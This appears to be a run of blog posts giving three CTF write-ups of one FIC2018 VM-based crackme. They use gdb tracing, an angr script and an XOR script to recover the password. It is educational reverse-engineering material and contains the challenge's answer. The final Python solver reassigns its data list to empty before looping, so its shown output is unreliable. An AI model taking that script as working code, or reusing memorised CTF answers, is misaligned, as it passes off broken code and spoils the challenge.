0x601680 <g_data+576>: 0xf7000000 0x0003bb33 0x66bb0000 0x990100ab
0x601690 <g_data+592>: 0x020000bb 0x02ab66f9 0x00bb9903 0xaaf90200
0x6016a0 <g_data+608>: 0x000000bb 0xbb33f800 0x00000001 0x02bbaae6
0x6016b0 <g_data+624>: 0xf9000000 0x0003bb33 0x66d40000 0x990100ab

The first non-zero byte is 0x55. This is probably the beginning of the code.
Now the decode part, if we look at what we have in 0x602800:

gdb$ x/20wx 0x602800
0x602800 <vm_func>: 0x00000011 0x00000000 0x00400696 0x00000000
0x602810 <vm_func+16>: 0x00000099 0x00000000 0x00400a40 0x00000000
0x602820 <vm_func+32>: 0x00000022 0x00000000 0x00400798 0x00000000
0x602830 <vm_func+48>: 0x00000033 0x00000000 0x00400697 0x00000000
0x602840 <vm_func+64>: 0x00000044 0x00000000 0x00400799 0x00000000
gdb$ x/x 0x00400696                  //What is there?
0x400696 <vm_ret>: 0x77058bc3   // oooh, the beginning of vm_ret :)
gdb$ x/x 0x00400a40
0x400a40 <vm_jnz>: 0x1ece058b   //and vm_jnz, and the others ^_^
gdb$

Ok. So the program reads a byte in the g_data part. Then it calls a function depending on this byte.

That's really, really a good point. We have a byte, and a function. Doesn't take long to understand that this the assembly:

0x11 is vm_ret RETURN
0x99 is vm_jnz JUMP if NON ZERO
0x22 is vm_cll CALL
0x33 is vm_mov MOVE
0x44 is vm_push PUSH
0x55 is vm_ecl ??
0x66 is vm_cmp COMPARE
0x77 is vm_jmp JUMP
0x88 is vm_jzz JUMP if ZERO
0xaa is vm_mvp ?? move? pointer maybe?
0xbb is vm_and AND
0xcc is vm_add ADD
0xdd is vm_xor XOR
0x00 is NOP (we guessed it)
0xee is END (we guessed it also)

Ladies and gentlemen, the asm of the VM.

3/ Let see what happens

So, the first byte is vm_ecl. In order to quickly run the binary, we break at 0x000000000040054a only if $rax!=0

gdb$ b * 0x0000000000400573 if $rax!=0
Breakpoint 3 at 0x400573
gdb$ c
Continuing.
gdb$ info reg rax
rax            0x55 0x55
gdb$ disass vm_ecl
Dump of assembler code for function vm_ecl:
   0x0000000000400d28 <+0>: mov    eax,DWORD PTR [rip+0x201be6]        # 0x602914 <regs+20>
   0x0000000000400d2e <+6>: lea    edx,[rax+0x1]
   0x0000000000400d31 <+9>: mov    DWORD PTR [rip+0x201bdd],edx        # 0x602914 <regs+20>
   0x0000000000400d37 <+15>: movsxd rdx,edx
   0x0000000000400d3a <+18>: mov    dl,BYTE PTR [rdx+0x601440]
   0x0000000000400d40 <+24>: cmp    dl,0xe1
   0x0000000000400d43 <+27>: je     0x400d6f <vm_ecl+71>
   0x0000000000400d45 <+29>: cmp    dl,0xe2
   0x0000000000400d48 <+32>: je     0x400de2 <vm_ecl+186>
   0x0000000000400d4e <+38>: cmp    dl,0xe0
   0x0000000000400d51 <+41>: jne    0x400e55 <vm_ecl+301>
(...)
   0x0000000000400d6a <+66>: call   0x400520 <exit@plt>
(...)
   0x0000000000400ddd <+181>: jmp    0x4004d0 <write@plt>
(...)
   0x0000000000400e50 <+296>: jmp    0x4004e0 <read@plt>

Well, a switch case. If next byte is 0xe1 0xe2 or 0xe0, this function behaves differently. We have read, write and exit function in it. That should be for input/output. Let's step over for the moment, and see what's happening:

gdb$ stepo
Temporary breakpoint 4 at 0x40057c
ENTER PASS :
gdb$

That's it. Let's go back to the VM disassembly a bit. We had:

0x601570 <g_data+304>: 0x00000000 0x0001e155 0x0c0d0300 0x0000e255
0x601580 <g_data+320>: 0x0cf20000 0x0000bb33 0xddf20000 0xcc1300bb

Put in right order: 55 e1 01 00 00 03 0d 0c 55 e2 00 00 f2 cf 33 bb... 55 is I/O, e1 seems to be output, numbers after are unknown (adress of the string probably), and next instructions should be 55 e2 (waiting for input). Let see the next instruction:

gdb$ info reg rax
rax            0x0c 0x0c
gdb$

Next instructions is 0x0c ?? As if the instruction pointer missed a step (?).
In our case, that's not really important because 0xc is not a valid instruction, so it will loop around all vm_functions, the iterate, then read 0x55. Let continue, stepover the vm_ecl function:

gdb$ stepo
Temporary breakpoint 5 at 0x40057c
ABCDEFABCDEF                       //entered myself
0x0000000000400580 in main ()
gdb$
gdb$ x/x 0x602914
0x602914 <regs+20>: 0x00000143    //offset of the instruction pointer
gdb$ x/wx 0x601440+0x143
0x601583 <g_data+323>: 0x00bb330c    //the instruction pointer
gdb$

and once again, the 0x0c invalid instruction. vm_ecl doesn't increment the instruction pointer to the next instruction. The VM is built on a way that it doesn't matter, as long as the instruction is invalid... This is kind of a bug!

Let's fast forward a bit, until a 0xdd instruction (XOR):

Now, a bit of refactoring, this is just the VM assembly extracted from g_data:
0xdd 0xbb 0x00 0x13 //vm_xor
0xcc 0xbb 0x00 0x00 0x00 0x00 0x01 //vm_add
0xdd 0xbb 0x00 0x37 //vm_xor
0xcc 0xbb 0x00 0x00 0x00 0x00 0x01 //vm_add
0xdd 0xbb 0x00 0xd3
0xcc 0xbb 0x00 0x00 0x00 0x00 0x01
0xdd 0xbb 0x00 0x3d
0xcc 0xbb 0x00 0x00 0x00 0x00 0x01
0xdd 0xbb 0x00 0xc0
0xcc 0xbb 0x00 0x00 0x00 0x00 0x01

Seeing a pattern? 0xbb shoud be an offset to somewhere, XOR is the key, and we slide this offset one by one, in pseudo code, it becomes:

xor(pass[i], 0x13)
i = i+1
xor(pass[i], 0x37)
i = i+1
etc...

We extract the key: 0x1337d33dc0 just by reading the vm assembly.

And what about the instruction pointer? Does it point to the right instruction after a vm_xor?

gdb$ info reg rax
rax            0xcc 0xcc
gdb$

yep, it works, so the vm_xor instruction advance the instruction pointer right.

The next steps are to understand other vm_XXX instructions, where data is stored, what is done with it, and so on.

Just step through the function and mark all known addresses (base address, offsets, registers, CPU flags, and you'll quickly be able to reverse any VM code. Follow the vm_cmp instruction, learn where are the offsets, and compare yourself the bytes.

4/ Why the crackme accepts more than one solution?

As we saw, sometimes, the instruction pointer is not incremented to the next instruction. If the instruction is illegal, nothing happen. But if the instruction pointer falls on a known instruction, a different behavior is done.
0xF4b found that the vm_mov is also buggy, and an 0xbb instruction is called (vm_and) instead of the vm_cmp, and the JNZ is never called afterwards.

5/ Conclusion

Thank you for scrolling this far ;-) Learn to pwn crackme.
If you want the a.out file to play with it, drop me a DM or email.

Those who want to do will find a way.

Those who don't want to do search an excuse.

0xMitsurugi

dimanche 28 janvier 2018

Solving a CTF chall the [crazy|OMG] way (FIC2018)

This is the third blogpost about the same crackme, you can read the first two ones here:

This time, an extremely simple solution. You thought that pin was almost cheating? Get prepared to see worse.

1/ Basic recon

mitsurugi@dojo:~/chall/FIC2018/v24$ ls -l a.out 
-rwxr-xr-x 1 mitsurugi mitsurugi 15568 janv. 24 14:30 a.out
mitsurugi@dojo:~/chall/FIC2018/v24$ strings a.out 
/lib64/ld-linux-x86-64.so.2
libc.so.6
exit
read
malloc
__libc_start_main
write
free
__gmon_start__
GLIBC_2.2.5
tPHc
fffff.
[]A\A]A^A_
;*3$"
FAILEDnWINnENTER PASS :              //look this line
 (... snip snip snip ...)
mitsurugi@dojo:~/chall/FIC2018/v24$

So, we imagine that FAILED means fail and WIN is the winning message, right?

That's all we need to know!
Yes. gdb? nope. asm? nope. reversing capabilities? nope. Lazinest? A lot.

2/ Hey, you like surprises and python?

you know angr, right? If not, check this awesome program. It can explore binaries, instrument them, modify them on the fly, explore all paths, and all by itself!

It blews my minds me on this:

#! /usr/bin/env python
# You are not judged because you fall. 
# You are judged by the way you get up after a fall.
#                          0xMitsurugi

import angr, datetime

print "Starting"
start = datetime.datetime.now()
#Loading the binary
proj = angr.Project('./a.out')
#Create a simulation manager
simgr = proj.factory.simgr()
#We search the word WIN somewhere in the file descriptor 1 (standard output)
simgr.explore(find=lambda s: "WIN" in s.posix.dumps(1))

#angr works hard here ...

#Let's see which input produce a 'WIN' in output
s = simgr.found[0]
# file descriptor 0 is standard input
flag = s.posix.dumps(0)

print "The flag is: %s " % flag
#At least we know this challenge is buggy..
print "\nWe know this challenge is bugged :("
print "Flag in hex is: %s" % (flag.encode('hex'))
end = datetime.datetime.now()
print "Time used: %s" % (end - start)

Basically we tell angr to open the binary, and explore it (like fuzzing, but better :) ) until it found the word "WIN" in the standard output. And then, we print the standard input which generates this output. Sounds crazy?

And, as you guess, in only 7 minutes, without any prior knowledge:

mitsurugi@dojo:~/chall/FIC2018/v24$ ./solver.py 
Starting
The flag is: iWaseMyTime 

We know this challenge is bugged :(
Flag in hex is: 6957617300654d7954696d65
Time used: 0:07:22.198219
mitsurugi@dojo:~/chall/FIC2018/v24$

Without the bug, angr would have found the good flag, but it remains impressive: the angr solution works. The only thing to know is that the binary prints WIN for victory, which could be found with a strings command..

Ready? Prepare yourself!

0xMitsurugi

Solving a CTF chall the [hard|good] way (FIC2018)

Hope you liked my last blogpost http://0x90909090.blogspot.fr/2018/01/solving-ctf-chall-easylazy-way-fic2018.html , this is the same binary, with a different analysis.

This crackme is simple enough to use it for learning purpose. I'm taking it for another round of reversing. This time, it's gdb-fu! In the CTF, this was my first approach, but pin was faster :-)

1/ Basics

We remember the function name, vm_xor and vm_cmp. Other function looks more like standard operation (JNZ, JMP, call, and so on).
The binary is not stripped, and we see a variable called 'regs'. We guess that's the registers of the VM. While running under gdb, we can print their contents with x/8wx &regs

2/ XOR part

In gdb, we have breakpoints, and we can execute commands at each breakpoints. We'll break at vm_xor, and see what's happening. I don't use any gdbinit scripts because it's a VM, and my gdbscripts are meant to be used in conjunction with known CPUs (ARM/Intel). The goal here is to count how many times the vm_xor function is called, and see if we can gain some insights of what is going on:

mitsurugi@dojo:~/chall/FIC2018/v24$ gdb -q -nx ./a.out
Reading symbols from ./a.out...(no debugging symbols found)...done.
(gdb) b * vm_xor 
Breakpoint 1 at 0x400c9e
(gdb) commands 
Type commands for breakpoint(s) 1, one per line.
End with a line saying just "end".
>echo vm_xor is called\n
>c
>end
(gdb) r
Starting program: /home/mitsurugi/chall/FIC2018/v24/a.out 
ENTER PASS :first try

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called

FAILEDn[Inferior 1 (process 4165) exited normally]
(gdb) r
Starting program: /home/mitsurugi/chall/FIC2018/v24/a.out 
ENTER PASS :1

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called

FAILEDn[Inferior 1 (process 4169) exited normally]
(gdb)

Ok, so we understand that vm_xor is called 12 times, whichever the size of the PASS is.

We hope now that vm_xor will works like the XOR: it takes two args from registers. Let's inspect this:

(gdb) commands 1
Type commands for breakpoint(s) 1, one per line.
End with a line saying just "end".
>x/8wx &regs
>c
>end
(gdb) r
Starting program: /home/mitsurugi/chall/FIC2018/v24/a.out 
ENTER PASS :123456ABCDEF

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000f2 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x0000014b 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000f3 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x00000156 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000f4 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x00000161 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000f5 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x0000016c 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000f6 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x00000177 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000f7 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x00000182 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000f8 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x0000018d 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000f9 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x00000198 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000fa 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x000001a3 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000fb 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x000001ae 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000fc 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x000001b9 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000fd 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x000001c4 0x00603010 0x00000000
FAILEDn[Inferior 1 (process 4291) exited normally]
(gdb)

Ok, so we don't see any of our PASS in register. The first one seems to progress one by one, and the 6th one makes progression. It could be relative address, or offset, or anything. Let dive into the vm_xor function. It must have an XOR operation, and it could be interesting to see the operands of the command:

(gdb) disassemble vm_xor 
Dump of assembler code for function vm_xor:
   0x0000000000400c9e <+0>: mov    0x201c70(%rip),%eax        # 0x602914 <regs+20>
   0x0000000000400ca4 <+6>: lea    0x1(%rax),%edx
   0x0000000000400ca7 <+9>: mov    %edx,0x201c67(%rip)        # 0x602914 <regs+20>
   0x0000000000400cad <+15>: movslq %edx,%rdx
   0x0000000000400cb0 <+18>: mov    0x601440(%rdx),%dl
   0x0000000000400cb6 <+24>: cmp    $0xab,%dl
   0x0000000000400cb9 <+27>: jne    0x400cf0 <vm_xor+82>
   0x0000000000400cbb <+29>: lea    0x2(%rax),%edx
   0x0000000000400cbe <+32>: add    $0x3,%eax
   0x0000000000400cc1 <+35>: mov    %eax,0x201c4d(%rip)        # 0x602914 <regs+20>
   0x0000000000400cc7 <+41>: cltq   
   0x0000000000400cc9 <+43>: movslq %edx,%rdx
   0x0000000000400ccc <+46>: movzbl 0x601440(%rax),%eax
   0x0000000000400cd3 <+53>: movzbl 0x601440(%rdx),%edx
   0x0000000000400cda <+60>: mov    0x602900(,%rax,4),%eax
   0x0000000000400ce1 <+67>: movslq 0x602900(,%rdx,4),%rdx
   0x0000000000400ce9 <+75>: xor    %al,0x601440(%rdx)         //HERE
   0x0000000000400cef <+81>: retq   
   0x0000000000400cf0 <+82>: cmp    $0xbb,%dl
   0x0000000000400cf3 <+85>: jne    0x400d27 <vm_xor+137>
   0x0000000000400cf5 <+87>: lea    0x2(%rax),%edx
   0x0000000000400cf8 <+90>: add    $0x3,%eax
   0x0000000000400cfb <+93>: mov    %eax,0x201c13(%rip)        # 0x602914 <regs+20>
   0x0000000000400d01 <+99>: cltq   
   0x0000000000400d03 <+101>: movslq %edx,%rdx
   0x0000000000400d06 <+104>: movzbl 0x601440(%rdx),%edx
   0x0000000000400d0d <+111>: movslq 0x602900(,%rdx,4),%rcx
   0x0000000000400d15 <+119>: mov    0x601440(%rcx),%dl
   0x0000000000400d1b <+125>: xor    0x601440(%rax),%dl         //and HERE 
   0x0000000000400d21 <+131>: mov    %dl,0x601440(%rcx)
   0x0000000000400d27 <+137>: retq   
End of assembler dump.
(gdb)

Easy, disable breakpoint 1, and create two more:

(gdb) disable 1
(gdb) b * 0x0000000000400ce9
Breakpoint 2 at 0x400ce9
(gdb) commands
Type commands for breakpoint(s) 2, one per line.
End with a line saying just "end".
>echo first XOR in vm_xor\n
>info reg al
>x/x 0x601440+$rdx
>c
>end
(gdb) b * 0x0000000000400d1b
Breakpoint 3 at 0x400d1b
(gdb) commands
Type commands for breakpoint(s) 3, one per line.
End with a line saying just "end".
>echo second XOR in vm_func\n
>x/x 0x601440+$rax
>info reg dl
>c
>end
(gdb) r
Starting program: /home/mitsurugi/chall/FIC2018/v24/a.out 
ENTER PASS :ABCDEF123456

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x60158e <g_data+334>: 0x13
dl             0x41 65                    //seems our key

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x601599 <g_data+345>: 0x37
dl             0x42 66                    //Yup it is

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x6015a4 <g_data+356>: 0xd3                  //So this one is the xor key
dl             0x43 67

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x6015af <g_data+367>: 0x3d
dl             0x44 68

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x6015ba <g_data+378>: 0xc0
dl             0x45 69

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x6015c5 <g_data+389>: 0xde
dl             0x46 70

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x6015d0 <g_data+400>: 0xab
dl             0x31 49

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x6015db <g_data+411>: 0xad
dl             0x32 50

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x6015e6 <g_data+422>: 0x1d
dl             0x33 51

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x6015f1 <g_data+433>: 0xea
dl             0x34 52

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x6015fc <g_data+444>: 0x13
dl             0x35 53

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x601607 <g_data+455>: 0x37
dl             0x36 54
FAILEDn[Inferior 1 (process 4575) exited normally]
(gdb)

Well, only the second XOR is used, but it's not really important at this point. The important point is to see that each of our PASS has been XORed with a constant string (you can repeat to veroify this).

So, we have an XOR key, if we copy it we have: 1337d33dc0deabad1dea1337

(1337d33dc0de?? 1337d34dc0de would have sound better, I think. Another bug? ^_^ )

Now we have to find the expected solution, because PASS^key=solution and with simple math, we can say that: PASS = key ^ solution.

3/ CMP part

Well, we use the same technics. Let's break on vm_cmp and see what happens in registers:

(gdb) disable 2
(gdb) disable 3
(gdb) b * vm_cmp 
Breakpoint 4 at 0x400852
(gdb) commands 
Type commands for breakpoint(s) 4, one per line.
End with a line saying just "end".
>x/8wx &regs
>c
>end
(gdb) r
Starting program: /home/mitsurugi/chall/FIC2018/v24/a.out 
ENTER PASS :123456ABCDEF

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x00000022 0x0000007a 0x00000005 0x00000060
0x602910 <regs+16>: 0x00000000 0x000001eb 0x00603010 0x00000000
FAILEDn[Inferior 1 (process 4746) exited normally]
(gdb) 
(gdb) r
Starting program: /home/mitsurugi/chall/FIC2018/v24/a.out 
ENTER PASS :ABCDEF123456

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x00000052 0x0000007a 0x00000075 0x00000060
0x602910 <regs+16>: 0x00000000 0x000001eb 0x00603010 0x00000000
FAILEDn[Inferior 1 (process 4751) exited normally]
(gdb)

Interesting. We see that register 1 changes, and register 2 stays the same.
One more check, because the key is 1337d33dc0deabad1dea1337:

'1' XOR '0x13' => 0x22
'A' XOR '0x13' => 0x52

So, we know that register 1 is PASS XOR key and register 2 is solution.

But, have you spotted something else really weird?

Register 3 changes too!!
And it don't take a lot of time to understand that register 3 holds the "PASS XOR key":

'2' XOR '0x37' => 0x05
'B' XOR '0x37' => 0x75

We know how to extract all bytes of the solution.
Once again, we use the gdb commands function to force register to have the good values, and let print this value.

(gdb) commands
Type commands for breakpoint(s) 4, one per line.
End with a line saying just "end".
>x/8wx &regs
>set *(char *) 0x602900 = *0x602904
>set *(char *) 0x602908 = *0x60290c
>c
>end
(gdb) r 
Starting program: /home/mitsurugi/chall/FIC2018/v24/a.out 
ENTER PASS :123456123456

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x00000022 0x0000007a 0x00000005 0x00000060
0x602910 <regs+16>: 0x00000000 0x000001eb 0x00603010 0x00000000

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x0000007a 0x0000007a 0x00000060 0x00000060
0x602910 <regs+16>: 0x00000000 0x000001f5 0x00603010 0x00000000

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x000000e0 0x000000b2 0x00000009 0x0000004e
0x602910 <regs+16>: 0x00000000 0x0000021b 0x00603010 0x00000000

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x000000b2 0x000000b2 0x0000004e 0x0000004e
0x602910 <regs+16>: 0x00000000 0x00000225 0x00603010 0x00000000

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x000000f5 0x000000b4 0x000000e8 0x000000bb
0x602910 <regs+16>: 0x00000000 0x00000255 0x00603010 0x00000000

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x0000009a 0x000000e6 0x0000009f 0x000000d4
0x602910 <regs+16>: 0x00000000 0x0000027b 0x00603010 0x00000000

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x000000e6 0x000000e6 0x000000d4 0x000000d4
0x602910 <regs+16>: 0x00000000 0x00000285 0x00603010 0x00000000

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x0000002e 0x00000049 0x000000de 0x00000083
0x602910 <regs+16>: 0x00000000 0x000002ab 0x00603010 0x00000000

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x00000049 0x00000049 0x00000083 0x00000083
0x602910 <regs+16>: 0x00000000 0x000002b5 0x00603010 0x00000000

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x00000026 0x0000007e 0x00000001 0x00000052
0x602910 <regs+16>: 0x00000000 0x000002db 0x00603010 0x00000000

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x0000007e 0x0000007e 0x00000052 0x00000052
0x602910 <regs+16>: 0x00000000 0x000002e5 0x00603010 0x00000000
WINn[Inferior 1 (process 5104) exited with code 0377]
(gdb)

Ok, job done, we just have to copy bytes from register 2 and 4. vm_cmp has two times two bytes to compare, but function is called twice. I really should dig inside this func to understand how this work :)

solution is: 7a60b24eb4bbe6d449837e52

4/ Victory

#! /usr/bin/python
# First you have to be hit to know how to defend.
#                                     0xMitsurugi

key='1337d33dc0deabad1dea1337'.decode('hex')
sol='7a60b24eb4bbe6d449837e52'.decode('hex')

sol=[]
for i in range(len(sol)):
    c=chr(ord(sol[i]) ^ ord(key[i]))
    sol.append(c)

print ''.join(sol)

And without any surprise:

mitsurugi@dojo:~/chall/FIC2018/v24$ ./crack.py 
iWasteMyTime
mitsurugi@dojo:~/chall/FIC2018/v24$

Job done, time to drink beer for victory.

I have not failed 700 times, I have not failed once.

I have succeeded in proving those 700 ways will not work.

When I have eliminated the ways that will not work,

I will find the way that will work

0xMitsurugi